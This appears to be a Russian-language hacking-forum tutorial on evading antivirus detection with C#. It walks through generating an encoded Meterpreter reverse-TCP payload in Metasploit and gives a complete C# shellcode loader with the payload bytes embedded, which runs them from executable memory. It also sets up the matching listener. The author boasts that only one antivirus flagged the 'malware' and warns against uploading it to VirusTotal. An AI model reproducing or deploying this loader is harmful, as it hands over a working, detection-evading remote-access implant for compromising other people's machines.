Привет. Господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#.
Обо всём предлагаю по порядку, и для начала сгенерируем полезную нагрузку в Metasploit.
Устанавливаем опции
И генерируем нашу нагрузку для языка C#
А дальше берем нагрузку и вставляем в код ниже в переменную buf
Далее поднимаем листенер
И компилируем наш билд
После компиляции и запуска получаем сессию
А теперь ссылка со сканом нашей малвари.
Только один антивирус задетектил
Ссылка на скан:
НЕ ЛИТЬ НА ВИРУСТОТАЛ
Обо всём предлагаю по порядку, и для начала сгенерируем полезную нагрузку в Metasploit.
Код:
use windows/meterpreter/reverse_tcp
Устанавливаем опции
Код:
set LHOST 192.168.1.237
set LPORT 1338
set EXITFUNC thread
Код:
generate -e x86/shikata_ga_nai -b '\x00' -i 3 -t csharp
А дальше берем нагрузку и вставляем в код ниже в переменную buf
Код:
using System;
using System.Runtime.InteropServices;
namespace ShellCodeByPass
{
    /// <summary>
    /// Minimal in-process shellcode runner: copies an embedded byte array into a
    /// freshly allocated RWX region and transfers control to it through a managed
    /// delegate. There is no staging, decryption or sandbox logic in this file —
    /// the bytes in <c>buf</c> are executed exactly as embedded.
    ///
    /// NOTE(review): the allocate-RWX / write / execute sequence below is the
    /// textbook in-process loader pattern and is widely fingerprinted by AV/EDR
    /// behavioural rules; the single-vendor detection claim on the page reflects a
    /// static scan, not runtime monitoring.
    /// </summary>
    public class Program
    {
        /// <summary>
        /// Win32 VirtualAlloc allocation-type flags (MEM_* values). Only
        /// RESERVE | COMMIT is used by <see cref="Main"/>.
        /// </summary>
        [Flags]
        public enum AllocationType : uint
        {
            COMMIT = 0x1000,
            RESERVE = 0x2000,
            RESET = 0x80000,
            LARGE_PAGES = 0x20000000,
            PHYSICAL = 0x400000,
            TOP_DOWN = 0x100000,
            WRITE_WATCH = 0x200000
        }

        /// <summary>
        /// Win32 page-protection constants (PAGE_* values). Only
        /// EXECUTE_READWRITE is used by <see cref="Main"/>; the three
        /// *_Modifierflag members are the PAGE_GUARD / PAGE_NOCACHE /
        /// PAGE_WRITECOMBINE modifiers and are never combined here.
        /// </summary>
        [Flags]
        public enum MemoryProtection : uint
        {
            EXECUTE = 0x10,
            EXECUTE_READ = 0x20,
            EXECUTE_READWRITE = 0x40,
            EXECUTE_WRITECOPY = 0x80,
            NOACCESS = 0x01,
            READONLY = 0x02,
            READWRITE = 0x04,
            WRITECOPY = 0x08,
            GUARD_Modifierflag = 0x100,
            NOCACHE_Modifierflag = 0x200,
            WRITECOMBINE_Modifierflag = 0x400
        }

        /// <summary>
        /// Win32 VirtualFree free-type values (MEM_DECOMMIT / MEM_RELEASE).
        /// </summary>
        public enum OpcodesToFree : uint
        {
            MEM_DECOMMIT = 0x4000,
            MEM_RELEASE = 0x8000
        }

        // kernel32!VirtualAlloc. Returns IntPtr.Zero on failure; SetLastError=true
        // makes Marshal.GetLastWin32Error() meaningful after a failed call, but the
        // caller below does not read it.
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);

        // kernel32!CreateThread. Declared but never called in this file — Main
        // executes the shellcode on the current thread via a delegate instead.
        [DllImport("kernel32.dll")]
        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        // kernel32!VirtualFree. With MEM_RELEASE the dwSize argument must be 0
        // (as passed in Main); a non-zero size would make the call fail.
        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, OpcodesToFree dwFreeType);

        /// <summary>
        /// Delegate type used to call the raw shellcode as if it were a cdecl
        /// function returning Int32. The shellcode is not a real cdecl routine —
        /// the signature only exists so GetDelegateForFunctionPointer can wrap the
        /// buffer address; the Int32 "return value" is meaningless.
        /// </summary>
        [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
        public delegate Int32 ExecuteDelegate();

        /// <summary>
        /// Entry point. Allocates an RWX region, copies <c>buf</c> into it, calls it,
        /// and releases the region once (if) the shellcode returns.
        /// </summary>
        /// <param name="args">Unused; no command-line handling is performed.</param>
        public static void Main(string[] args)
        {
            // 624-byte payload produced by the Metasploit "generate ... -t csharp"
            // step described on the page (windows/meterpreter/reverse_tcp, x86,
            // shikata_ga_nai x3, null byte excluded). The LHOST/LPORT pair is baked
            // into these bytes; changing the listener means regenerating the array.
            // NOTE(review): this is 32-bit shellcode, so the process that runs it
            // must itself be 32-bit (e.g. build with Prefer32Bit / x86 platform
            // target); an AnyCPU build on 64-bit Windows will crash inside del().
            byte[] buf = new byte[624] {
            0x89,0xe7,0xdb,0xdc,0xd9,0x77,0xf4,0x5e,0x56,0x59,0x49,0x49,0x49,0x49,0x49,
            0x49,0x49,0x49,0x49,0x49,0x43,0x43,0x43,0x43,0x43,0x43,0x37,0x51,0x5a,0x6a,
            0x41,0x58,0x50,0x30,0x41,0x30,0x41,0x6b,0x41,0x41,0x51,0x32,0x41,0x42,0x32,
            0x42,0x42,0x30,0x42,0x42,0x41,0x42,0x58,0x50,0x38,0x41,0x42,0x75,0x4a,0x49,
            0x69,0x6c,0x59,0x78,0x4c,0x42,0x45,0x50,0x63,0x30,0x37,0x70,0x33,0x50,0x4b,
            0x39,0x38,0x65,0x74,0x71,0x49,0x50,0x31,0x74,0x4e,0x6b,0x52,0x70,0x74,0x70,
            0x4c,0x4b,0x42,0x72,0x76,0x6c,0x4e,0x6b,0x71,0x42,0x57,0x64,0x6e,0x6b,0x70,
            0x72,0x31,0x38,0x76,0x6f,0x38,0x37,0x63,0x7a,0x55,0x76,0x46,0x51,0x4b,0x4f,
            0x4e,0x4c,0x75,0x6c,0x30,0x61,0x73,0x4c,0x53,0x32,0x34,0x6c,0x51,0x30,0x4a,
            0x61,0x78,0x4f,0x66,0x6d,0x75,0x51,0x59,0x57,0x58,0x62,0x79,0x62,0x42,0x72,
            0x51,0x47,0x6e,0x6b,0x72,0x72,0x42,0x30,0x6e,0x6b,0x71,0x5a,0x47,0x4c,0x4c,
            0x4b,0x50,0x4c,0x72,0x31,0x61,0x68,0x39,0x73,0x50,0x48,0x77,0x71,0x38,0x51,
            0x32,0x71,0x4c,0x4b,0x43,0x69,0x31,0x30,0x43,0x31,0x4b,0x63,0x4e,0x6b,0x33,
            0x79,0x62,0x38,0x78,0x63,0x54,0x7a,0x61,0x59,0x4e,0x6b,0x70,0x34,0x6e,0x6b,
            0x35,0x51,0x69,0x46,0x54,0x71,0x49,0x6f,0x6c,0x6c,0x79,0x51,0x38,0x4f,0x74,
            0x4d,0x33,0x31,0x38,0x47,0x45,0x68,0x39,0x70,0x52,0x55,0x6c,0x36,0x46,0x63,
            0x33,0x4d,0x39,0x68,0x65,0x6b,0x51,0x6d,0x47,0x54,0x63,0x45,0x59,0x74,0x72,
            0x78,0x6c,0x4b,0x51,0x48,0x65,0x74,0x45,0x51,0x68,0x53,0x73,0x56,0x6e,0x6b,
            0x64,0x4c,0x32,0x6b,0x4e,0x6b,0x51,0x48,0x77,0x6c,0x46,0x61,0x7a,0x73,0x6e,
            0x6b,0x45,0x54,0x4c,0x4b,0x47,0x71,0x4a,0x70,0x6e,0x69,0x51,0x54,0x45,0x74,
            0x71,0x34,0x73,0x6b,0x61,0x4b,0x51,0x71,0x76,0x39,0x43,0x6a,0x70,0x51,0x6b,
            0x4f,0x4b,0x50,0x71,0x4f,0x63,0x6f,0x33,0x6a,0x6c,0x4b,0x55,0x42,0x4a,0x4b,
            0x4c,0x4d,0x33,0x6d,0x32,0x48,0x56,0x53,0x50,0x32,0x63,0x30,0x77,0x70,0x43,
            0x58,0x63,0x47,0x62,0x53,0x50,0x32,0x61,0x4f,0x53,0x64,0x35,0x38,0x50,0x4c,
            0x63,0x47,0x37,0x56,0x46,0x67,0x79,0x6f,0x7a,0x75,0x6d,0x68,0x5a,0x30,0x33,
            0x31,0x55,0x50,0x57,0x70,0x34,0x69,0x79,0x54,0x72,0x74,0x36,0x30,0x61,0x78,
            0x77,0x59,0x4b,0x30,0x72,0x4b,0x45,0x50,0x4b,0x4f,0x48,0x55,0x71,0x7a,0x56,
            0x65,0x31,0x78,0x77,0x4e,0x4e,0x56,0x45,0x62,0x6e,0x46,0x45,0x38,0x47,0x72,
            0x37,0x70,0x43,0x35,0x65,0x6a,0x4b,0x39,0x39,0x76,0x62,0x70,0x42,0x70,0x42,
            0x70,0x56,0x30,0x43,0x70,0x52,0x70,0x73,0x70,0x42,0x70,0x61,0x78,0x7a,0x4a,
            0x46,0x6f,0x79,0x4f,0x59,0x70,0x69,0x6f,0x6a,0x75,0x4f,0x67,0x33,0x5a,0x54,
            0x50,0x36,0x36,0x30,0x57,0x35,0x38,0x7a,0x39,0x79,0x35,0x70,0x74,0x71,0x71,
            0x39,0x6f,0x6e,0x35,0x4c,0x45,0x79,0x50,0x54,0x34,0x44,0x4c,0x39,0x6f,0x50,
            0x4e,0x75,0x58,0x30,0x75,0x68,0x6c,0x55,0x38,0x48,0x70,0x4d,0x65,0x4c,0x62,
            0x30,0x56,0x49,0x6f,0x4a,0x75,0x70,0x6a,0x57,0x70,0x50,0x6a,0x74,0x44,0x31,
            0x46,0x63,0x67,0x52,0x48,0x44,0x42,0x49,0x49,0x79,0x58,0x63,0x6f,0x4b,0x4f,
            0x48,0x55,0x4c,0x4b,0x70,0x36,0x32,0x4a,0x31,0x50,0x43,0x58,0x37,0x70,0x56,
            0x70,0x75,0x50,0x63,0x30,0x73,0x66,0x53,0x5a,0x63,0x30,0x55,0x38,0x30,0x58,
            0x49,0x34,0x33,0x63,0x5a,0x45,0x49,0x6f,0x49,0x45,0x4e,0x73,0x56,0x33,0x61,
            0x7a,0x73,0x30,0x52,0x76,0x73,0x63,0x52,0x77,0x53,0x58,0x63,0x32,0x68,0x59,
            0x48,0x48,0x53,0x6f,0x79,0x6f,0x7a,0x75,0x43,0x31,0x79,0x53,0x47,0x59,0x39,
            0x56,0x34,0x35,0x5a,0x4e,0x39,0x53,0x41,0x41
            };

            // Byte-for-byte copy of buf. Convert.ToByte on a byte is the identity, so
            // schell is always identical to buf and this loop adds nothing — it is
            // presumably left over from a version where buf was not already byte[].
            byte[] schell = new byte[buf.Length];
            for (int i = 0; i < buf.Length; i++)
            {
                schell[i] = Convert.ToByte(buf[i]);
            }

            // Reserve + commit a private RWX region of Length+1 bytes (the extra
            // byte is never written or executed). Address is chosen by the OS.
            IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(schell.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);

            // Debug.Assert is compiled out in Release builds, so a failed allocation
            // is not caught there: Marshal.Copy below will throw on a null
            // destination and the finally block then calls VirtualFree(IntPtr.Zero).
            // The message also says "remote" memory, but the allocation is local.
            System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: Couldn't allocate remote memory");
            try
            {
                // Write the payload into the executable region ...
                Marshal.Copy(schell, 0, baseAddr, schell.Length);
                // ... wrap its address as a managed delegate ...
                ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
                // ... and jump into it on the current thread. Control only comes
                // back here if the shellcode returns (EXITFUNC=thread on the page);
                // for a reverse_tcp stager that means after the session ends.
                del();
            }
            finally
            {
                // Release the whole region; dwSize must be 0 with MEM_RELEASE.
                VirtualFree(baseAddr, 0, OpcodesToFree.MEM_RELEASE);
            }
        }
    }
}
Код:
use exploit/multi/handler
set LHOST 192.168.1.237
set LPORT 1338
set PAYLOAD windows/meterpreter/reverse_tcp
И компилируем наш билд
После компиляции и запуска получаем сессию
А теперь ссылка со сканом нашей малвари.
Только один антивирус задетектил
Ссылка на скан:
НЕ ЛИТЬ НА ВИРУСТОТАЛ